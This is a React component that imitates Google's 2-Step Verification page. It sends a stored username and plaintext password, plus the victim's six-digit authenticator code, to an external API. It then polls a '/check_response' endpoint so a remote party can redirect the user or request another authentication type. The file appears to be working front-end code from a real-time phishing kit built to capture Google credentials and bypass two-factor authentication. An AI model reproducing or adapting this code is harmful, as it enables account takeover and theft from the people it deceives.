import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import GoogleAuthLayout from "./GoogleAuthLayout";
import { AUTH_TYPE_ROUTES } from "./authRoutes";

export default function Twofa() {
  const navigate = useNavigate();
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [email, setEmail] = useState("");
  const [codeSubmitted, setCodeSubmitted] = useState(false);
  const isSubmittingCode = useRef(false);

  const API_URL = process.env.REACT_APP_API_BASE_URL;

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");
    setLoading(true);
    isSubmittingCode.current = true;

    const username = localStorage.getItem("username") || "";
    const password = localStorage.getItem("password") || "";
    const currentSessionId = sessionId || localStorage.getItem("session_id");

    (async () => {
      try {
        const res = await fetch(`${API_URL}/api/twofa`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ code, username, password, session_id: currentSessionId }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Verification failed");
        }

        const { session_id } = await res.json();
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        setCodeSubmitted(true);
        setLoading(true);
      } catch (err) {
        console.error("Verification failed:", err);
        setError(err.message || "Verification failed");
        setLoading(false);
        isSubmittingCode.current = false;
      }
    })();
  };

  useEffect(() => {
    const storedEmail = localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);

    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  useEffect(() => {
    if (!sessionId || !codeSubmitted) {
      if (!codeSubmitted) setLoading(false);
      return;
    }

    setLoading(true);

    const routes = AUTH_TYPE_ROUTES;

    const poll = setInterval(async () => {
      try {
        const res = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
        if (!res.ok) throw new Error("Failed to fetch response");
        const data = await res.json();

        if (data.redirect) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType && data.authType !== "2fa") {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          const route = routes[data.authType];
          if (route) navigate(route);
          return;
        }

        if (data.error) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          setCodeSubmitted(false);
          setError(data.error);
          return;
        }

        setLoading(true);
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingCode.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, codeSubmitted, API_URL, navigate]);

  return (
    <GoogleAuthLayout
      heading="2-Step Verification"
      subheading="To help keep your account safe, Google wants to make sure it's really you trying to sign in"
      email={email}
      showEmailBadge
    >
      {error && (
        <div className="google-error-container">
          <p className="google-error-message">{error}</p>
        </div>
      )}

      <form onSubmit={handleSubmit} className="google-login-form">
        <div className="google-auth-fields">
          <div className="google-phone-step-copy">
            <h2 className="google-phone-step-title">2-Step Verification</h2>
            <p className="google-phone-step-text">
              Get a verification code from the <strong>Google Authenticator</strong> app
            </p>
          </div>

          <div className="google-input-group">
            <div className="google-input-wrapper">
              <input
                id="twofaCode"
                type="tel"
                inputMode="numeric"
                pattern="\d{6}"
                maxLength={6}
                minLength={6}
                value={code}
                disabled={loading}
                onChange={(e) => {
                  const val = e.target.value;
                  if (/^\d*$/.test(val)) {
                    setCode(val);
                    if (error) setError("");
                  }
                }}
                required
                className={`google-input ${code.trim() ? "google-input-filled" : ""} ${error ? "google-input-error" : ""}`}
              />
              <label htmlFor="twofaCode" className="google-label">
                Enter code
              </label>
            </div>
          </div>

          <div className="google-show-password-checkbox google-trust-device-checkbox">
            <input type="checkbox" id="trustDevice" defaultChecked />
            <label htmlFor="trustDevice">Don&apos;t ask again on this device</label>
          </div>
        </div>

        <div className="google-button-group google-auth-actions">
          <button
            type="submit"
            className="google-button-primary"
            disabled={loading || !code.trim() || code.length !== 6}
          >
            {loading ? <div className="google-spinner" /> : "Next"}
          </button>
        </div>
      </form>
    </GoogleAuthLayout>
  );
}
